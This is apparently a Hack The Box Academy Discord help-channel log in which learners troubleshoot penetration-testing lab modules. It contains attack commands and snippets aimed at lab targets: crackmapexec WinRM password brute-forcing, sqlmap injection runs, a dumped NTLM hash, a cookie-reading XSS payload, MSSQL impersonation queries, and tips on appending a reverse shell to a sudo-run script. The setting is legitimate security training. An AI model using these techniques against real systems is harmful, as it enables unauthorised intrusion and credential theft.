which question exactly

skill assessment or other

Could use a hand on the logrotate module,

I run the exploit, trigger the log rotation, and then the exploit fails when it tries to validate the payload written

target = fopen(targetpath, "w");
if(target == NULL)
{
fclose(source);
printf("Shit 2!\n"); // Yeah, this line's mine, debugging...
exit(EXIT_FAILURE);
}

I guess one prerequisite for the whole thing even working is that logrotate runs as root. But if it wasn't then what's the point of the lab?! What am I missing?

I think I need some help with the Active Subdomain Enumeration.

I exported the TARGET="<ip address>" and the would run: nslookup -query=TXT $TARGET.
but, I am getting an error that the server can't find the ip address.

The weird thing I am notcing is that the error message is printing the ip address in reverse.

there i'm new to HTB. I keep getting this error when trying to run sudo /home/nibbler/personal/stuff/monitor in the Nibbler box. Been trying to finish this room up for a bit now and just can't seem to progess. I keep getting a command not found err when inputting the above command. Ic oould use some help. thaks in advance and many blessings

What command are you trying to run with sudo?

sudo /home/nibbler/personal/stuff/monitor.sh

changed the permissions and got in

hi i'm stuck Windows Privilege Escalation Skills Assessment - Part II question 2
already got revershell in meterpreter but its always timeout

Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>

I think you could also use a powershell reverse shell base64 encrypted one liner or just without encryption as u want

no i mean, im on exploit
i think i know the issue, i need to be fast type command after got meterpreter

But I dont understand why you prefer gotta use meterpreter and no nc

i follow kernel exploit

are you sure it's a kernel exploit?

sure, now i already finish

strange

Module: Attacking Common Applications - Skills Assessment II
Question: What is the FQDN of the third vhost?
Tried: dig axfr inlanefreight.local @IP
inlanefreight.local failed: connection refused.

Should I reset the target or am I missing something? Vhosts added to /etc/hosts

I think say the pw brute forcing, where you must brute-force via ssh and pw is say #2135984 on the list... that's (needlessly) frustrating... yes, I know I'm exaggerating, yes, one could always use a diff word list, but, it's not you're given indication of what the pw may be.... OK, rant over.

I'ts been a LONG time since I did that, but (and I cuold well be mis-remembering), one (and only one) of the hosts has unauth axfr... is this the only host that's avail to look at? If not, might write a script to loop thru and check all of them...

We are used to the fact that if we want to crack a password, rockyou.txt is the list of choice and we can crack the password within 1-2 minutes.

But the reality is different.
Sometimes it takes longer and outside of CTFs, rockyou.txt is no longer the list of choice.

I think that's exactly what the module is trying to convey.

hey guys need help with Module: password attacks , section: pass the hash question no.4

Would be nice if it gave some guidance to what to try... If I'm on a real engagement, I know who customer is, where they are located, etc and can make some educated guesses. But in the ssh brute forcing, nope. Yes, it can be representatove of real life... But even then, no, at least not for me as I've never brute forced hundreds of thousands of passwords against a single ssh host against a single user like that.

Creating diagrams and noting down the IP addresses and subnet details of the systems is an invaluable tip from that module. It significantly aided my understanding. you might find this video by John Hammond useful https://www.youtube.com/watch?v=pbR_BNSOaMk

Try brute forcing a different service, not ssh.

are you running command liine as admin?

yes , i was not runing the cmd as admin . thanks for your response

same result with import-module command get-GPPPassword. Did exactly like hacker13.. and it worked

I'm going from memory, but whatever it was, I was literally doing what the module stated to do, and it was brutal. Someone else mentioned frustration, someone said nothing should be frustrating you, just challenging you, I highlight a legit frustration of mine -- if you were never frustrated, all the power to you. Yes, oftentimes usually was failure of doing something wrong (or at least not right), but I stand behind my belief that SOME portions of SOME modules are just legit frustrating, period, end of story, and we can agree to disagree.

And while we might agree to disagree on the nature of this challenge, the key takeaway is that perseverance and resilience in the face of frustration are good traits in any learning process esp hacking. but it's perfectly okay to take a step back, take a deep breath, and approach the problem again with a different perspective. Keep at it and who knows... when I look back, the most frustrating bits I faced was where I learned the most.

Password Attacks Lab - Hard

Referred to forums for help, but to no avail.
I'm stuck at the very intial step where I need to bruteforce to obtain Johanna's password for SMB/RDP. I tried using Crowbar, CrackMapExec, and Hydra with both mutated and original password lists and it either takes way too long/is unable to find any password.

Any hints on what possible tools to use will be appreciated. Thank you!

Use Crackmapexec and WinRM with mutated password list.

crackmapexec winrm 10.129.X.X -u johanna -p mut_password.list

I did try this before, but it went on for like 5 hours IIRC

is this normal?

I can't remember but it shouldn't take 5 hours, give it another go.

^

🫡 I will try again, thank you

Prepare yourself the BitLocker part might take 5 hours though

can you please help in sam "ssh" I have logged into ssh but could not find flag

look around

that's all i can say lol

Hello! everyone Excuse me I have a problem, when I try to use gobuster to complete the task with this command:
gobuster dir -u http:\94.237.57.142:58207\ -w /usr/share/wordlists/dirb/common.txt
I recive this error message , Error: required flag(s) "wordlist" not set

does the wordlist exist in that directory

it really won't, there's plenty of links in this chat regarding mounting bitlocker to linux

¯_(ツ)_/¯

But how can install? jeje

well it's generally installed with dirbuster

yes

Ohh let me seach about this, Tnx

https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0 this is by far the simplest guide

this one you can almost completely follow braindead

first time I did it i mounted to host; but second time I decided to try mounting in vm

your notes contain spoiler

as long as it works for you

Escuse me, i'll check but dirbuster is already installed in my device...

¯_(ツ)_/¯

locate common.txt

Oh sure, im gonna try

Yes I have the same way, but the gobuster can't execute the command

then your gobuster command is wrong

¯_(ツ)_/¯

Hahaha

The ironic it is the same command in the page, well Tnx i gonna check

Update: the command not work if we use tmux... hahaha lol

thanks

Hello, I made a tunnel with netsh (10.129.63.134 1515 172.16.6.50 3389), but when I try to connect with xfreerdp i receive some errors [06:31:02:039] [33607:33608] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014], [06:31:02:039] [33607:33608] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail, [06:31:02:039] [33607:33608] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1, and I can't understand why.

xfreerdp /v:10.129.63.134:1515 /u:user /p:password /cert:ignore

you should be trying to rdp directly to the next target

that's why

I want to RDP to host B trough Host A. I created a tunnel with netsh on host A... but it's not working.

...

Doing the pivoting module yeah?

Just Follow the steps exactly

Not pivotant, but AD skill assessment and i dont't understand why it is working.

It's not working*

Hey I am having the same issue did you work it out I have no idea I have the sam and system files still wrong hash???

Check that section under the pivoting module again, see if there's a step you missed

Module:Attack Web Apps Section:Attacking Thick Client Applications --- actually found two files having the magic bytes MZ in it --- but both arent .net applications so i cant reconstruct code with de4dot --- any hint?

Already checked n times. I will switch to something else probably.

Yeah so i used the rectic with the backup password

copied the hash to attack machine

dumped with secrets dump

and hash is wrong

Administrator:500:aad3b435b51404eeaad3b435b51404ee:20ff7845bfb62119d751d9b910547236:::

thats the hash i get but no matter how i attempt it for answer always wrong

500 is local aswell

so i dont understand??

Try different format

^

Ntlmv2

Btw

what you mean different format

how can I change the format of the hash

I think it asks for a part of the hash

I'm not sure how to phrase it

yeah i tried that as well

Marcie

tried the end hash

tried both hashes

tried the whole line hahaha

i used samdump2 for it as well gave different hash tried them as well all the same was wrong

Look up ntlmv2 hashes

It's stored as LM:NT (which btw hashcat cracks LM first, then permutates that for NT)

im confused though it says to get the files which would be sam and system can i get the ntlmv2 hash from sam and system

Module:Attack Web Apps Section:Attacking Thick Client Applications --- actually found two files having the magic bytes MZ in it --- but both arent .net applications so i cant reconstruct code with de4dot --- any hint?

any links to help I tried to drop mimikatz on machine to get it but gets removed by av Im guessing

Most of the labs have av disabled

You can also see if it's in c:\tools

¯_(ツ)_/¯

yeah already checked no tools on this machine

Then get a precompiled version and transfer it over

¯_(ツ)_/¯

yeah i tried that as well

hey same problem here. any tips if Im doing something wrong? got 4 flags and the flag for 3rd question is the one with text 'flagfour' in it and now cant find anything else

yeah i think its issue on the machines

That's the right flag

Iirc

its not being accepted though. it got accepted as answer to 3rd question lol

Oh sorry didn't realize you meant something else

can I dm you if you have solved this?

sorry just realised different convo

I dont recall too much , just need to curl a bunch

After getting the proper vhosts

okay no problem. yeah did that but 1 flag still missing I guess

Then you missed a host

arent there 5?

Who is getting this error:

me too

Like I said , I don't recall

Just make sure youre enumerating

yeah mimikatz wont copy accross

please tag me or DM if anyone can help me with finding the last flag on Virtual Hosts in Information Gathering module. want to make sure Im doing everything correctly. I dont think Ive missed anything but maybe I have

If doing xfreerdp mount drive with /drive:<fileshare name>,/path/to/file/directory

I really got blocked for 15m

If you're talking about the 502, you were not the only one. Quite a few people had the same issue.

^

Yeah if anyone can help with my module flick me DM if you can just found out not suppose to DM people but Im easy I have got this far in module for Windows Priv esc so anyone stuck on anything DM me can help best I can

I mean, it is saying me to slow down with the requests I send to the server and that I've been blocked

it only appears when I go to the exams tab

Contact support if its related to an exam.

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

How long did it take for you if you may recall? Running it since 3-4 hours now..

Is this message always supposed to be here? I had to switch the vpn location for the Pawnbox and I wasn't sure if that message was always there? I asked because I am have been having trouble rdp'ing into a remote target IP and I was wondering if that is the issue(

it's always there

netsh drives me crazy

Why?

wait, i can't add images 🙂

Address Port Address Port

10.129.119.249 1562 172.16.6.50 3389

Read and follow #welcome

/v:10.129.119.249:1562 /u:xxxx /p:xxxx /cert:ignore

but it's not working

and i don't understand hy

why*

What does the network look like?
Is port 3389 open on the host 172.16.6.50?

It's open.

What is the machine 172.16.6.100?
Does machine 10.129.119.249 have direct access to machine 172.16.6.50?

Host A (10.129.119.249, 172.16.5.100), Host B (172.16.6.50). I created a tunel with netsh on Host A, but i don't understand why I can't RDP to Host B.

Then it should actually work like this. Restart the Lab and try again

anyone willing to help me with the nibbles room? got it mostly figured out just need a little guidance

Hi there, I am stuck in TNS section of the Footprinting module. I cannot find any hash password. Could someone please help me? 🙂

A nudge for you, try using chromium browser instead of firefox to analyze the requests this particular section.

Hi guys,
I'm stuck on the skills assessment , ADVANCED SQL INJECTIONS. Could someone please help me? 🥲

I just booted pwnbox and looked into it and realized firefox was not executing the javascript from the target application for some reason.

Hi,

I'm stuck in ACL Enumeration module but it's more with platform issue ! The RDP are just really unstable (crash often or I type a letter, it came like 6 seconds after). I really cannot answer the question because of that...

I tried the Pwnmachine and my own VM, same thing...

If you have any idea I take !

Thanks !

Not sure if it was working on your firefox, but pretty sure you would have realized quicker the POST request being made if the javascript worked.

Finally I figured out Thick client application part. Man I wanna cry 😭😭

Credentialed Enumeration - from Windows - Anyone else run into an 'incorrect' username/password when attempting to rdp onto the foothold with the provided creds?

Is anyone able nslookup 10.10.34.136 ? I keep getting a ***server cant find 10.10.34.136 error. I'm trying to find the FQDN of that ip address. Is that even the correct approach?

Use single quotes.

Correct, it has a special character, so i've used single quotes, no dice. Also reset a few times, and manually typed it on the rdp session and manually typed, copy and pasted, and did a comparison on show to make sure there were no typos.

I'd have to open the lab again. I don't know right now. usually that is the issue or just wrong username/password.

Wish these boxes were more responsive

This will send a reverse request to your DNS resolver. But it will not know the IP.
||dig NS domain.com @10.10.10.10||

This gives me a communications error to <ip address>: timed out error

You are already using the IP of the target, right?

Yep

VPN and Target is up?

Yeah. I have reset both and redownloaded a new VPN configuration.

This given ip address is a random IP from one of the questions in the module.

No, the IP is from your target

The module always uses example IPs

Maybe - here's the side by side. In case i'm typing/copy and pasting incorrectly

let me boot it up. One moment.

Also try to reset

The question is "What is the FQDN of the ip address 10.10.32.136?" They want me to actually use the IP of the spawned target's IP?

Can you do a zone transfer?

Same error

can i see your command?

Nope. CLI and on hacktarget.com both give me errors.

Show me your command. External websites cannot possibly help because this data is not public 😉

nslookup 10.10.34.136

Hmm..

Give me a few minutes, i'm going to wait to see if it changes with a few minutes of waiting.

You are trying to do a reverse DNS query, which does not work.
Logically, your DNS resolver does not know this IP.
You have to do everything in the lab. Public DNS resolvers cannot help you

Yeah its fine for me. your timer says 115 minutes or less right? @civic terrace

this one is 111

Does it still show logon failed?

I'll try again here in a couple min. started a full update just in case

Sorry, I guess I don't understand what you mean doing everything in the lab. Do you mean I have to use the IP address of the target even though they give me an IP in the question?

I need help with crackmapexec skills assessment Q3 please if anyone can give a nudge.

What you are technically doing now:
You send a query to your public DNS resolver, for example 9.9.9.9 and ask it for the domain from the IP 10.10.34.136
But it can't answer you because it doesn't know what HTB does. In this case, only the authoritative DNS server itself can answer you and that is the target server.

You must therefore specify your DNS resolver (Target)

Yeah, makes sense, thanks. I guess I am still confused because even if I use the target ip I get the same error.

Target IP = 10.129.42.195
command = nslookup 10.129.24.195
error = *** server can't find 10.129.24.195

Yes, because you also make another reverse DNS query and send it back to your public DNS resolver.
You have to specify the server (Target).

https://www.nslookup.io/learning/how-to-specify-a-dns-server-in-nslookup/

typing this out in case anyone else runs into and searches on discord. Working now with xfreerdp, but same error with rdesktop. Not going to TS rdesktop, just gonna keep pushing with the course on xfreerdp.

I restarted the lab numerous time.

I've done everything to a T in the nibbles room and still no reverse shell to get the root flag. I've been at it for 3 days and its infuriating. I've tried multiple connections. I really like the content of HTB but the machines are so slow and unresponsive its making me second guess a sub. Any help would be appreciated,

Thanks for the beta. I'll keep trying.

I continue to with this exercise over and over again. The HTB tech people said I should try the powershell command prompt(instead of cmd listed in the example. ) I tried that a few times and I could not generate an answer. someone suggested that I go back to the command prompt(as used in the module) and I tried that. When I run 'regsvr32.exe SocksOverRDP-Plugin.dll' in command prompt I get an error. But when I run the same command in 'Powershell prompt' It runs as is expected. https://academy.hackthebox.com/module/158/section/1439

were you running command prompt as admin?

Oh I forgot that

Can some just confirm that my messages are being seen

Thank you

so you unzipped the file on the box, appended the rev shell to the end of the monitor.sh file, and ran with sudo?

yes

the server keeps going down

and the rev shell is your tun0 ip yeah?

yes

just tried again from the beginning and my browser wont connect to the vuln machine. Says server unresponsive

restart the target

and make sure your vpn connection is still running

I've done that. 3x already

Hello can anybody help my whith a eror i am getting in metasploit ?
i am new in this domain so i cant realy fiugure it out by myself

If you tell us what the problem is and which module you need help with, someone will surely be able to help you.

Msf::OptionsValidateEror The following opions failed to validate : INFILENAME i get this eror after i set thee INFILENAME and i use exploit

don't think there's an option called INFILENAME

usually it's FILENAME

or FILEPATH

but as Payload said: if you tell us what module you're doing we can help better

ca we talk in private ? so i can explain you better the problem ?

no

because you still haven't said the module

so I can't help you further, especially if it's one I haven't done yet

thee module is ; windows/fileformat/adobe_pdf_embedded_exe

... we mean the Academy module my guy

i dont realy know what is that

https://academy.hackthebox.com

thanks

in future this channel is for help with academy content, not random shit you're trying to do

okk

Are all boxes as unresponsive as nibbles?

no

it seems like you're just having some issues with this one

trying to get those rank points eh?

?

just reran that section and had 0 issue with getting root

Guys, has anyone completed the hard lab of PASSWORD ATTACKS ?

I don't know if it's my fault, but seems as nothing is working ...

I have been stuck here for 3 days now. I know I am using the right commands, but I get error after error

Tag Me if you can help somehow, and eventually, thanks in advance

What exactly is not working?

I am pretty sure that I have david's password, but when I try to use smbclient, I get the following error:

session setup failed: NT_STATUS_LOGON_FAILURE

Hi :D

also, I cannot extract the correct hash from the Logins.kdbx file. I mean, I extract one hash, but when I try to crack it, both with John and hashcat, I get errors (on both Kali and pwnbox)

How did you try it?
So as not to spoil anything, you can also send me a DM

I will send a DM

In the Information gathering module-Web Edition, it goes over briefly a combination of nslookup and WHOIS to determine if the target is using host providers. I wanted to ask why that is important information to know since wouldn't the host providers be out of scope without third party approval?

They're using examples allowed by those companies' bug bounty programs

understood, thank you🙏

Can i DM someone for help on Windows Privilege Escalation Skills Assessment - Part I ?

Can i DM someone for help on Using Crackmapexec Skills Assessment

Hey guys, can anyone suggest an alternative for joomla-brute.py for joomla login bruteforcing?

the nmap script does not seem to work for me and neither does the metasploit module (I may be doing something wrong of course) so I'd be grateful for any tips

What is it? State your problem here

Splunk module:
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an analytics-driven SPL search against all data the source process images that are creating an unusually high number of threads in other processes. Enter the outlier process name as your answer where the number of injected threads is greater than two standard deviations above the average. Answer format: _.exe

What does it mean by "process image that are creating an unusually high number of threads"

Is is talking about processes, dll or something else? I need a pointer

I got it, it has to do with id 8

I could use some help with a question in the Active Subdomain Enumeration module. I'm not sure if my approach is right or if I have the right syntax.

The question is: "Which IP address is assigned to the "ns.inlanefreight.htb" subdomain? Submit the IP address as the answer.

Target machine ip: 10.129.161.101
Subdomain: ns.inlanefreight.htb
Command(s): nslookup $TARGET ns.inlanefreight.htb, dig $TARGET ns.inlanefreighthtb

The nslookup error says "couldn't get address for ns.inlanefreight.htb"
The dig error just displays server and random information about the server.

Does anyone have an idea how to move forward?

try iplookup on google?

or using whatweb? or gobuster?

I just looked at my questions for that module to help and mine says us.inlanefreight.htb not ns.inlanefreight.htb ... not sure if we get slight modifications to questions depending on region tho

can anyone help me with the nibbler box? im nearly at the end and keep getting an error. plz help

Wow. I cant believe the dyslexia tonight. I was so hungup on NSlookup, haha. Thanks. Also, I think reversing the domain and the target helped.

||dig a domain @ip||

try

what have you tried?

i was doing ns.inlanefreight.htb instead of us.inlanefreight.htb smh

everything except copying the file to make it executable. Trying that now. I've kept getting the error of [[: not found

just trying to execute the monitor.sh

you can try overwriting the content of the file with a shell

Hy,
In the module [MaOS foundamentals] - Where are the Applications related to the system stored at? I need to find the answer to the question.

Someone can help me?

What do you mean?]

Wow the Module: Password attacks' Hard Skills Assessment was the most fun I have had since starting Academy. That was absolutely brilliant. Loved it! Well done HTB

Tried this too, it's somehow taking too long :/
crackmapexec winrm 10.129.X.X -u johanna -p mut_password.list

Any hints on what the password starts with so I can reduce the size of the password list? Not exactly sure why bruteforcing this particular lab is taking so long (unlike the ones in medium and easy).. Thank you!

hello i make the module file uplaod type fylter i have succeful upload but i have cannot be displayed bcause it contains error .any hint

ends with a special character

experiment with different file names

ok

bless you , i got it finally after 3 days

awesome!

i have find

great!

i have tried things harder is the easer is work

Anyone done the medium footprinting lab exercise?

Stuck on the last part

What are you stuck on exactly and what have you tried

The mssql queries

Just cant seem to get it

Like how am i supposed to find that hidden user in that database file

Would love a hint

Check the databases

Having an issue with the questions in web proxies skill assessment. "Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload) "

Just to be clear I have taken the suggested wordlist, re-encoded in the reverse order and ||appended it to the existing cookie||, is that right?

got it by doing prefix encoding too

Okay so have done all of web proxies skills apart from the first question. The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.

I modified the ||disabled|| tag to read ||enabled|| but that doesn't seem to work

the hint is in the name of it, lucky, just keep trying

cheers

I hate that

@torpid copper please ask permission before dming per the #rules

why my sqlmap doesnt work? Module:sqlmap Section:Running SQLMap on an HTTP Request Question 3
sqlmap http://94.237.55.96:45268/case4.php --data='{id:1*}' --batch --level 5 --risk 3 --random-agent --dbs --random-agent

--dump?

i dont know can you tell me? @wary plover

same it doesnt work

@wary plover

i have used -u
sqlmap -u 'http://94.237.54.197:41838/case4.php' --data='{id:1*}' --batch --level 5 --risk 3 --random-agent --dbs --random-agent --dump

--data is passing the http request info through

like when you do --data in a curl request

https://cdn.comparitech.com/wp-content/uploads/2021/07/sqlmap-Cheat-Sheet.pdf

i have tried -r but it gives me the same result with --data

What exactly is not working?
Do you receive an error message?

Isn't id parameter suppose to be in quotes as well?

Anyways try a request file it would be easy

how to send ss to this server?

And also read #welcome and verify and post screenshots. it would be easy to understand the error

you need to link your main htb account to discord

What does the request you passed to SQLmap look like?

sqlmap -r Desktop/req.txt --batch --dbs

What is in the req.txt file?

POST /case4.php HTTP/1.1
Host: 94.237.54.197:41838
Content-Length: 8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://94.237.54.197:41838
Referer: http://94.237.54.197:41838/case4.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

{"id":*}

Your Parameter (value) is wrong

Oh ok thank you

Hi there! I need a help with the Attacking GitLab module. I found 7 usernames so far and none was accepted by the HTB portal as the correct answer. I was even able to use 1 to get the RCE and got the final flag...

How do we know whether if a id_rsa file needs to be cracked?

PS: https://security.stackexchange.com/questions/129724/how-to-check-if-an-ssh-private-key-has-passphrase-or-not
This solved my question, thanks!

if you try and use it and it requires a pw

👍

Anyone at Intro to Whitebox Pentesting SkillAssessment that could give me a hand? I'm stuck at the second exercise where I get "code injection should not be possible, even without sanitization or validation" even after removing || the "new function" part and changing it with a standard "console.log" ||. I tested the code locally to make sure it doesn't crash so I don't see what is causing the check to fail.

I'm on the 'getting started' module, i've just completed the web enumerating section and was working through the initial foothold section when my i stopped being able to access the web server and pinging the IP gives ' destination host unreachable'. I've reset the VPN multiple times, changing it from UDP to TCP and changing the server that it's on but nothing works. Any ideas?

Try this - sqlmap -u http://94.237.55.96:45268/case4.php --method POST --data='{"id":1}' --batch --level 5 --risk 3 --random-agent --dbs -v 3

If the request should be a POST request, you need to specify --method POST. If it’s not specified sqlmap assumes it’s a GET request.

your data string should have the property names and string values enclosed in double quotes. And you were using the —random-agent switch twice

(Sorry if this is not the place for these questions)
So, I'm at the final chapter of the getting Started module, where I have to hack a box without a walkthrough.
I have managed to use metasploit to get a shell, but I'm logged in as www-data, instead of a normal user, like in previous examples.
Can I get some hint on how to escalate privilege? Or did I do smth wrong along the way?

www-data is the web user

I know that

It doesn't seem to have many perms, so I don't know where to go from here

it's still a "normal" user :P just do stuff that you've done previously in this module

check what stuff he does have access to

does sudo -l tell you anything

it can use ||/usr/bin/php||

check gtfobins for what that could mean ;)

well, vm time is over, will give it another shot tomorrow

you can use something like virtualbox and download Kali or Parrot and use it that way

¯_(ツ)_/¯

https://help.hackthebox.com/en/articles/6369713-installing-parrot-security-on-a-vm

I don't have enough ram for a vm :p

Has anyone already done the "ADVANCED SQL INJECTIONS " module and could give me a hand?

will get a better laptop soon

Hello, as you know, some modules on HTB Academy require VPN connection. I can't get any efficient connection from the modules that require VPN. When you turn VPN off and on, it comes on for 5 seconds and then goes away again. Is there anyone who has a problem with VPN like me and fixed it?

make sure that 1) you aren't using the pwnbox at the same time with your vm
2) you aren't running multiple vpn connections (ps aux | grep openvpn)

I am using more than one VPN, how can I kill them?

sudo killall openvpn

ty

make yous questions here directly

well, i'm currently stuck on the second part of the skill assessment (the RCE part). I'm having a problem with the query ||CREATE FUNCTION||

did you modify the python exploit that they give us o are you trying manually ?

I modified the python exploit.

I've modified some queries to make them applicable to the assessment, but I haven't managed to adapt the one I quoted above ...

Hello, it is possible to use evil-winrm or impacket-psexec with netsh?

I am stuck on the DNS module in Attacking Common services. Anyone solved it and can walk me through?

follow the instructions in the section iirc you need to use the tool suggested

Hello, can you help me please. I’m doing File Upload Attacks module and when I upload phpbash.php which and I visit Server_IP:Port/uploads/phpbash.php the interface appears but I can’t write on it.

It’s like a picture I can’t controle it

Hello guys can you help me please, I send a XSS stored but I don't receive the cookie, why ? where should it be displayed?

then i dont understand the point

strange

go through the section again

go through the section again

Yes and I see a video where it succeeds, so I don’t understand

Can someone help me with the information gathering module --active subdomain enuneration

I am lost at how to get the txt record (part 3)

you probably didn’t upload it correctly 👍

what have you tried?

I have completed the zone transfer and got all the other records but I can't find a txt record anywhere

HI all ! Anyone had finish the kerberos attacks module and can help me with the SA part ? 🙂

If you do a zone transfer you get all records, it exists

@lusty thicket the hint is that one of the zones will have a txt record but the only zones I got are root.inlanfreight, and inlanefright

There's more

Subdomains exist

You limited yourself to what you assumed to be the zones

but the zone transfer not give any txt recrods

Because it exists on a different subdomain

A couple of those entries seem interesting

But I guess if you don't know much about networking, you won't see it right away

I think my issue also stemmed from assuming my zone transfer would return all records not just the A record

I did. The lessons on both GET and POST invite the student to try out the fetch request feature in devtools, except there's no request to "copy as fetch" since as I said already the browser doesn't make any usable request

@fathom pendant Thank you! I got it!

yes I read et I test a lot of options but nothing

strange

strange

<script>
document.body.innerHTML = document.cookie;
</script>

with this it is okay

can be added in hint of the section

why on earth does htb provide a password list for the attacking common services section when the password can only be found in the rockyou and not in the provided list .... This cost me serveral hours today

Program 'chisel.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1
char:1

Some ideas? 😄

I have this flag Apache Tomcat/9.0.31 (Ubuntu) but is not working I try different formats, in Module GetStarted section 7, for the question: Perform a Nmap scan of the target. What is the version of the service from the Nmap scan running on port 8080? Can be wrong HBT?

I try 9.0.31 and Apache Tomcat 9.0.31 etc..

Try just the name without the version 🙂

wow thanks. I try different things and not this one xD

how do you guyz revise?

I know this is a few days old, but for further clarity and anyone else who has the same question, The DNS server responded and gave you 127.0.0.1 (from its perspective). One way of thinking about this is if you asked someone "Who can me give the address for bob" and they replied "me", You then can ask them for the address not yourself

Read #rules an #welcome , go to the police

Threatening someone else goes outside ethical hacking

im in a country where police doesn't have any power

And is not related at all to this server

Well that sucks. But nothing we can do, again read the #rules

Do you know if there is any problem with htb infra?

Occasionally there's a 502 error

Does anyone keep on getting their RDP connections dropping every 90 seconds and then it takes 5 mins to reconnect before the same thing happens?

regen your vpn and make sure its tcp. You can also contact support as well.

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Hello, did you encounter any issues, after sending the URL, i don't receive anything, but my test 10.10.x.x:42060 [302]: GET /?username=test&password=test&submit=Login works fine, i Use my own VM

Hey guys,

im having some problems with the Windows Fundamentals course, im trying to mount using this command after escalating priveledges, but for some reason im getting an error.

sudo mount -t cifs -o username=htb-student,password=Academy_WinFun! //Targetip/"Wiggydocs" home/htb-student/Desktop/
Couldn't chdir to home/ws01/htb-student/Desktop/: No such file or directory

anyone have any ideas?

seems like a infra issue... Using PWNBOX and cant get a consistent ARP ping to targets. RDP Sessions also died randomly

yeah it just died on me too, i ended up disabling the firewall and i got disconnected after a couple of minutes.

thanks for that.

So are people having issues with HTB academy? I can't seem to ssh in

In SQL Injection Fundamentals > Subverting Query Logic > Authentication Bypass; It's asking for bypassing the login form as user 'tom'.
I've tried injecting SQL queries but I always end up logging in as 'admin'. I tried [Hints] which is asking me to look at the cheat sheet which didn't help me.
Now, in this executing query, we simply cannot do something like WHERE username != 'admin', so how should I approach this problem?
Executing query: SELECT * FROM logins WHERE username='' AND password = '';

Resolved! Very frustrating, there is no issue when using PWNBOX

Everything working fine on my side

Im working on the skill assesment - hard on attacking common services.

I managed to impersonate John on the mssql and found the linked server. However, I have trouble to lateral move further is there something wrong with my query since i dont see a admin acc?

||SQL> EXECUTE('SELECT DISTINCT b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = ''IMPERSONATE''') AT [LOCAL.TEST.LINKED.SRV]
name

john

simon ||

You need to bypass user password, so you should specify usermane as tom and find a logic to bypass password, OR and AND will help you, what you need is to understand the precedence

I don't get the reference but I smiled 😃

It was a joke because Ive never seen you before

but youre a mod and evidently with the academy team lol

Thanks for the response but I've bypassed the password already, even tried username='tom' or username != 'admin', still getting logged in as 'admin'

Nevermind, I got the flag

I don't know why adding comments after the username worked though, gonna go look at it now

can someone explian why i cant see the conatiner listed in the ps cmnd

Lol, does the default banner of SSH include version and specifically hostname and domain?

In Linux I mean

I experienced the issue you have, pay attention to the logic, use AND + OR and pay attention to the precedence , if you can not figure out it, DM me!

Anyone know if parrotbox has rockyou in it?

Edit: yes it does

what is worng with the targets

restart pc?

Finally completed pentest path. -not the exam

guys, hope you don't mind a noob question

But for a newbie in cybersec, which should I go first CBBH or CPTS? As in which is more digestible for a noob like me. I have basic in IT, but none in cybersec

I have read a few times that they have overlapping knowledge

In this room
https://academy.hackthebox.com/module/115/section/1139
The parrot os vm we are asked to connect to via rdp, but the vm doesn't even have a browser to utilize the file upload vuln

It has tor for some reason but not firefox

type the command firefox into the terminal

Thank's, it launched but when I was browsing using the application search couldn't even find it

strange

depends on what you want to focus on, cbbh on web, cpts more on general pentesting. both should set up the foundation well enough

RDP is showing black screen. Anybody know how to fix this?

Press ESC/Enter/Space and etc

What do you do if your keyboard doesn't have an etc key? 😜

use the other mentioned keys

It was a joke.

Not a very good one.

eh a pretty overused one

The only types of jokes I know.

and my reply was more sarcastic than serious

B- for effort

Best grade I ever got. 😅

whats that?

an rdp session related to one of the academy modules

:^)

El dinoman001

He's my neighbor's cousin

Whass up homie

hola amigo who are you tho 😅

i just did not no ;-;

so asked

this isn't a gen chat; you can find out how to unlock more of the server by reading #welcome

yeah amigo read the rules

ok what is gen chat tho 😅

general chat

xd

oh

#general

oh payload ik that =D

a place for random chatter that's unrelated to specific topics; like this channel is for the academy modules

sowy

where is the general chat?

read #welcome and follow instructions :^)

ty

@lucas_phosphate

I am unable to login into kira account in ssh please help me

@umbral wasp don't worry it's another typically HTB horribly constructed challenge with a large lack of information

Bruteforce the password using the hashcat mutations rule on "LoveYou"

It seems like you're rather upset about it. Imo there's plenty of reasons to be upset about it, but the kira one isn't really one of them

The one thing about that module is patience (and attacking other ports than ssh)

What I dislike about the module is the fact that I have to guess which magic wordlist to use for the specific challenge instead of just picking a damn password from rockyou.txt like any other CTF-challenge / lesson instead of having to make a number of mutated wordlists..

Except, generally, after you make the mutated wordlist - that's the one you use

kira's password is in-fact in that list

The module is meant to simulate that you've gathered some info regarding passwords and have some rule list that you pass it through

Often the modules do have you use the provided wordlist(s) in their resources in some fashion

My complaint is that the list ends up extremely long: but it's still dwarfed by rockyou

Well you make a fair point. I actually choose to make a completely new wordlist containing only combinations of loveyou and completely missed the fact that LoveYou is also in the original mutated wordlist. I bite my words.

Yeah the hint is more to speedtrack you to get it, but I think it's still like 5-10 minutes using the original mutated list

fuck kira tbh

Double F

another time-wasting task having to deal with opening the damn document after cracking the password.

Hope am doing this the correct way with the correct wordlist.
For the WINRM segment, Found the username via a nmap scan
Now using the rockyou.txt to brute force the password
In the examples user.list or password.list has been used
Is there anything I missed about a specific wordlist
https://academy.hackthebox.com/module/147/section/1327

